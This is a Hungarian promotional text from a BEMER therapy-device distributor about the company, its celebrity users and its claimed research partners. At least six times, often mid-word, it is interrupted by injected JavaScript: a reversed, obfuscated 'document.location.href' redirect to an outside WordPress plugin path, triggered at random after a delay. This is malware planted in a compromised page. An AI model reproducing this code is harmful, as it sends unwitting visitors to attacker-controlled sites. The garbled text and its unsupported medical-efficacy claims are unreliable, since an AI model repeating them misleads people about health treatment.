A BEMER forgalmazók vagyunk többen is olyanok, akik valamilyen érintettség révén kerültünk kapcsolatba a BEMER készülékekkel, a BEMER céggel.  Sokan vagy maguk, vagy családtagjaik révén kerestek megoldást a betegségek ellen. A mi családunkban édesanyámnál gyógyszer súlyos mellékhatásaként kialakult  állapot ellensúlyozására szerettük volna alkalmazni a BEMER terápiát, de sajnos elég későn találtuk meg. Az Ő esetében a segítség későn érkezett, viszont több betegnek szerencsére már tudtam segíteni és amikor valakinek sikerül megmenteni a lábát, az mindenkinek nagy öröm: Betegnek, orvosnak és a BEMER szaktanácsadónak is. Igazából fontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos az, hogy egy vállalkozás hasznot termeljen, de a hasznot nemcsak pénzben mérik – különösen igaz ez egy egészségügyi szolgáltató vállalkozásnál, – hanem sok jó szóban, gyógyulásban, mosolyban és megelégedettségben. Így van ez a BEMER forgalmazásával. Úgy gondolom, aki BEMER készülékkel foglalkozik, azok sokan ezt az életérzést tapasztalták meg. Számos BEMER partner szerény eszközökkel kezdi a pályafutását a BEMER-nél, és stabil egzisztenciát talál. A BEMER folyamatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosan támogatja partnereit, orvosokat, egészségügyi szakdolgozókat, forgalmazókat toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}továbbképzésekkel, hogy alapos tudásukat az ügyfeleik szolgálatába tudják állítani.

Sok ötlet volt a kezdet kezdetén és az ötletek megosztása nagyban hozzájárult a valós sikerhez. Ha két embernek egy-egy almája van és almát cserélnek, akkor mindkettőjüknek marad egy-egy almája. Ha azonban mindegyiküknek egy-egy ötlete támad és ezt megosztják, egymással, akkor mindegyiküknek két-két ötlete lesz. A BEMER-nél megosztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott tudás és lelkesedés toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tovaterjedt és a ma már a világ számos pontján ismerik és használják a BEMER készülékeket.

Nagyon intenzív párbeszéd folyik a közélet kiemelkedő szereplőivel és kitűnő, sőt lelkes visszajelzéseket kapunk a BEMER fizikai érterápiáról. Nem csupán az élsportoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolók, mint például Boris Becker, Marc Giradelli, Tina Weirather, Manuel Charr, a Schalke04, FC Basel, az AC Milan vagy néhány profi kerékpáros csapat tartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozik a BEMER lelkes felhasuználóinak táborába, hanem színészek, szórakoztató művészek vagy legendás zenészek, mint például Rudolf  Schenker (Scorpions) is a termékeinkkel ápolja az egészségét.

Partneri együttműködést ápolunk klinikákkal, egyetemekkel és orvosi intézményekkel illetve kutató szervezetekkel, mint például a NASA.